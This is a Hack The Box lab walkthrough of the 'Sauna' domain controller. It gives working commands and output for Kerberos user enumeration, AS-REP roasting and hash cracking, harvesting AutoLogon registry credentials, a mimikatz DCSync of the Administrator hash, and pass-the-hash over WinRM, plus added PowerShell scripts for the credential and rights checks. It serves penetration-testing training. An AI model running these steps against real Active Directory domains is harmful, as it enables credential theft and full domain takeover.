HTB Walkthrough: Sauna
Overview
Sauna is a Windows machine on Hack The Box built around an Active Directory domain controller (EGOTISTICAL-BANK.LOCAL). Valid usernames are enumerated against Kerberos, one of them has pre-authentication disabled, and its AS-REP hash is cracked offline (AS-REP roasting) for the initial foothold as fsmith. Privilege escalation starts with AutoLogon credentials for a service account left in the registry; BloodHound then shows that this account holds the replication rights needed for DCSync, so the Administrator NT hash is dumped with mimikatz and passed over WinRM to take the Domain Controller.
Initial Enumeration
The first step is an nmap scan with -A, which combines OS and version detection, the default script set and a traceroute:
sudo nmap -A 10.129.95.180
Nmap Output:
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL)
445/tcp open microsoft-ds
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (WinRM)
This confirms an Active Directory domain: EGOTISTICAL-BANK.LOCAL.
SMB Enumeration
Try anonymous SMB share enumeration:
sudo smbclient -L //10.129.95.180 -N
No shares listed.
Check SMB signing requirements with CrackMapExec:
sudo crackmapexec smb 10.129.95.180
Output confirms SMB signing is required, as expected on a domain controller, so NTLM relay to SMB on this host is not an option.
Web Enumeration (Port 80)
Run gobuster to discover directories:
sudo gobuster dir -u http://10.129.95.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 90
Result: Only styling/image directories, no obvious attack vector.
Active Directory Enumeration
Anonymous LDAP Search
Without a base DN the anonymous query returns an error, because ldapsearch has no idea where in the tree to search:
sudo ldapsearch -x -H ldap://10.129.95.180
So first ask the root DSE for its naming contexts (a base-scope search needs no base DN):
sudo ldapsearch -x -H ldap://10.129.95.180 -s base namingcontexts
Confirmed base DN:
DC=EGOTISTICAL-BANK,DC=LOCAL
Full LDAP dump (anonymous bind is permitted, so domain objects come back; keep the output, since the account names it contains are useful later):
sudo ldapsearch -x -H ldap://10.129.95.180 -b 'DC=EGOTISTICAL-BANK,DC=LOCAL'
Kerberos User Enumeration
Enumerate valid usernames:
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.129.95.180
Discovered users:
- administrator
- hsmith
- fsmith
- the same names with capital letters (Kerberos principal names are case-insensitive, so these are not separate accounts)
Saved to users.txt.
AS-REP Roasting
AS-REP roasting targets accounts with "Do not require Kerberos preauthentication" set: the KDC returns an AS-REP for them to anyone who asks, and part of it is encrypted with the user's password-derived key, which can be cracked offline. GetNPUsers.py tries every name in users.txt:
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -dc-ip 10.129.95.180 -usersfile users.txt EGOTISTICAL-BANK.LOCAL/
fsmith has pre-authentication disabled. Two hashes come back only because users.txt lists the name twice in different case; they belong to the same account, so one of them (saved to np.txt) is enough:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:[REDACTED]
$krb5asrep$23$Fsmith@EGOTISTICAL-BANK.LOCAL:[REDACTED]
Cracking AS-REP Hashes
Crack with Hashcat (mode 18200 is Kerberos 5 AS-REP, etype 23):
sudo hashcat -m 18200 np.txt /usr/share/wordlists/rockyou.txt --force
Password found:
Thestrokes23
Initial Foothold
Connect via Evil-WinRM:
evil-winrm -i 10.129.95.180 -u fsmith -p 'Thestrokes23'
Session successful.
Find user.txt:
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/19/2025 8:16 PM 34 user.txt
Privilege Escalation
Upload & Run winPEAS
upload /home/kali/Desktop/sauna/winPEASx64.exe winPEASx64.exe
.\winPEASx64.exe
winPEAS reveals AutoLogon credentials stored under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, a key any local user can read:
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
Exploit svc_loanmgr
The stored DefaultUserName (svc_loanmanager) does not match any domain account; the account list gathered during enumeration shows the real name is svc_loanmgr, and the AutoLogon password works for it:
sudo evil-winrm -i 10.129.95.180 -u svc_loanmgr -p 'Moneymakestheworldgoround!'
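The two findings above (AutoLogon values in the registry, and a stored username that does not match a real account) can be checked directly from the Evil-WinRM session. The following is an added example, not code from the original walkthrough: it reads the Winlogon key winPEAS reported, then looks the stored name up through ADSI and, if nothing matches, lists candidate service accounts. The domain DN is taken from the page; the "svc_" naming prefix used for the candidate search is an assumption.

```powershell
# Added example (not from the original walkthrough). Reads AutoLogon values
# from the Winlogon key and checks the stored user against the domain.
# Assumes domain DC=EGOTISTICAL-BANK,DC=LOCAL and an "svc_" prefix for
# service accounts (assumption, not stated on the page).

$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$auto = Get-ItemProperty -Path $winlogon -ErrorAction Stop

# AutoAdminLogon = "1" means the stored credentials are used at boot, but the
# DefaultPassword value is readable by any local user either way.
[pscustomobject]@{
    AutoAdminLogon    = $auto.AutoAdminLogon
    DefaultDomainName = $auto.DefaultDomainName
    DefaultUserName   = $auto.DefaultUserName
    DefaultPassword   = $auto.DefaultPassword
} | Format-List

# The value may be stored as DOMAIN\user or as a bare name; keep the name only.
$storedName = ($auto.DefaultUserName -split '\\')[-1]

# Query the directory via ADSI; no RSAT / ActiveDirectory module needed.
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.SearchRoot = [ADSI]'LDAP://DC=EGOTISTICAL-BANK,DC=LOCAL'
$searcher.PropertiesToLoad.AddRange([string[]]@('sAMAccountName', 'distinguishedName'))
$searcher.Filter = "(&(objectCategory=person)(sAMAccountName=$storedName))"

$match = $searcher.FindOne()
if ($match) {
    "Stored AutoLogon user exists: $($match.Properties['samaccountname'][0])"
} else {
    "No account named '$storedName'. Candidate service accounts (svc_* is an assumption):"
    $searcher.Filter = '(&(objectCategory=person)(sAMAccountName=svc_*))'
    foreach ($r in $searcher.FindAll()) {
        '{0,-20} {1}' -f $r.Properties['samaccountname'][0], $r.Properties['distinguishedname'][0]
    }
}
```

Run it from the fsmith shell before trying the password anywhere: a mismatch between the stored name and the directory is exactly the situation on this box, and the candidate list points at svc_loanmgr without guessing.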
Further Enumeration with SharpHound
Upload and run:
upload /home/kali/Desktop/sauna/SharpHound.exe SharpHound.exe
.\SharpHound.exe
Import .zip into BloodHound:
sudo bloodhound
Within BloodHound, identify that svc_loanmgr has GetChanges and GetChangesAll on the domain object (the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights). Together these are exactly the rights a domain controller uses for replication, so the account can DCSync: ask the DC for any user's secrets as if it were another DC.
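The same conclusion can be reached without collecting and importing SharpHound data. This is an added example, not part of the original walkthrough: run from the svc_loanmgr Evil-WinRM session, it reads the ACL of the domain head through ADSI and prints every principal holding a replication extended right, then names the identities that have the pair DCSync needs. The domain DN comes from the page; the three GUIDs are the standard Active Directory extended-right identifiers.

```powershell
# Added example (not from the original walkthrough). Lists replication
# extended rights on the domain head, which is what BloodHound shows as
# GetChanges / GetChangesAll. ADSI only; no RSAT module required.

$replicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$extendedRight = [int][System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
$genericAll    = [int][System.DirectoryServices.ActiveDirectoryRights]::GenericAll

$domain = [ADSI]'LDAP://DC=EGOTISTICAL-BANK,DC=LOCAL'
$acl    = $domain.psbase.ObjectSecurity      # System.DirectoryServices.ActiveDirectorySecurity
$aces   = $acl.GetAccessRules($true, $true, [System.Security.Principal.NTAccount])

$hits = foreach ($ace in $aces) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    $rights = [int]$ace.ActiveDirectoryRights
    $guid   = $ace.ObjectType.ToString()
    if ((($rights -band $extendedRight) -ne 0) -and $replicationRights.ContainsKey($guid)) {
        # Explicit grant of a single replication right.
        [pscustomobject]@{ Principal = $ace.IdentityReference.Value; Right = $replicationRights[$guid] }
    } elseif ($ace.ObjectType -eq [guid]::Empty -and
              ((($rights -band $genericAll) -eq $genericAll) -or (($rights -band $extendedRight) -ne 0))) {
        # An empty ObjectType with ExtendedRight (or GenericAll) covers every
        # extended right, so the replication rights are included implicitly.
        [pscustomobject]@{ Principal = $ace.IdentityReference.Value; Right = 'All extended rights (implicit)' }
    }
}

$hits | Sort-Object Principal, Right | Format-Table -AutoSize

# Full DCSync of NTDS needs Get-Changes AND Get-Changes-All on the same
# identity (or an implicit all-extended-rights grant).
$hits | Group-Object Principal | Where-Object {
    $r = $_.Group.Right
    (($r -contains 'DS-Replication-Get-Changes') -and ($r -contains 'DS-Replication-Get-Changes-All')) -or
    ($r -contains 'All extended rights (implicit)')
} | ForEach-Object { "DCSync-capable: $($_.Name)" }
```

Two caveats: the principal in an ACE may be a group rather than the user you are running as, so check group membership of svc_loanmgr against the list (BloodHound does this expansion for you); and Get-Changes on its own only permits reading non-secret attributes, which is why the script insists on the pair.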
DCSync Attack with Mimikatz
Upload and run mimikatz (the same secrets can be pulled from the attacker host with impacket's secretsdump.py using svc_loanmgr's credentials, which avoids dropping a binary on the box):
upload /home/kali/Desktop/sauna/mimikatz.exe mimikatz.exe
.\mimikatz.exe "lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:Administrator" exit
Extracted Administrator NTLM hash:
Hash NTLM: 8********************f98e
Root Flag
Use Pass-the-Hash: Evil-WinRM accepts the NT hash directly with -H, so the Administrator password never needs to be cracked:
evil-winrm -i 10.129.95.180 -u Administrator -H 8********************f98e
Verify and grab root.txt:
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 6/19/2025 8:16 PM 34 root.txt